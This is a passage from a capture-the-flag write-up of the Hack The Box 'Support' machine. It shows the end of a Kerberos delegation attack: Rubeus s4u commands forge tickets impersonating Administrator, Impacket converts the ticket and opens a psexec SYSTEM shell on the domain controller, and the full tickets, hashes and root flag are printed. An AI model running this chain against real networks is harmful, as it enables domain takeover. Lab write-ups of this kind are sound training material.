[*] Input username             : FAKE-COMP01$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake-comp01.support.htb
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : 06C1EABAD3A21C24DF384247BC85C540
[*]       aes256_cts_hmac_sha1 : FF7BA224B544AA97002B2BEE94EADBA7855EF81A1E05B7EB33D4BCD55807FF53
[*]       des_cbc_md5          : 5B045E854358687C

We need to extract the value of rc4_hmac. Once we have this, we can proceed to generate Kerberos tickets for the Administrator.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP01$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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


[*] Action: S4U

[*] Building S4U2self request for: 'FAKE-COMP01$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP01$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

      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
      MA4bDEZBS0UtQ09NUDAxJA==

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      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
      MBYbBGNpZnMbDmRjLnN1cHBvcnQuaHRi
[+] Ticket successfully imported!

Rubeus successfully generated the Kerberos tickets. To proceed, we can take the last Base64-encoded ticket and use it on our local machine to gain a shell on the domain controller as Administrator.

Here are the steps:

Copy the value of the last ticket.
Paste it into a file named ticket.kirbi.b64.
Note: Before saving the file, ensure that all whitespace characters are removed from the ticket value.

Next, create a new file named ticket.kirbi by decoding the Base64 value of the previous ticket.

base64 -d ticket.kirbi.b64 > ticket.kirbi

Finally, we need to convert the .kirbi ticket into a format compatible with Impacket. This can be done using Impacket's TicketConverter.py.

└─$ impacket-ticketConverter ticket.kirbi ticket.ccache                                             
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

To obtain a shell, you can use Impacket's psexec.py tool with the converted Kerberos ticket.

└─$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file sugVzfTC.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service yQLQ on dc.support.htb.....
[*] Starting service yQLQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

A shell as NT AUTHORITY\SYSTEM has been successfully obtained. The root flag can now be retrieved from the C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  03:17 AM    <DIR>          .
05/28/2022  03:11 AM    <DIR>          ..
12/10/2024  06:29 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,961,053,184 bytes free

C:\Users\Administrator\Desktop> type root.txt
d8aa8d65b3aa44620299a0687232f98a

C:\Users\Administrator\Desktop> ipconfig /all
 
Windows IP Configuration

   Host Name . . . . . . . . . . . . : dc
   Primary Dns Suffix  . . . . . . . : support.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : support.htb
                                       .htb

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-B9-C7-57
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.129.233.185(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Tuesday, December 10, 2024 6:28:24 PM
   Lease Expires . . . . . . . . . . : Wednesday, December 11, 2024 1:28:23 AM
   Default Gateway . . . . . . . . . : 10.10.10.2
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DNS Servers . . . . . . . . . . . : 127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

References

Hack The Box Official Writeup for Support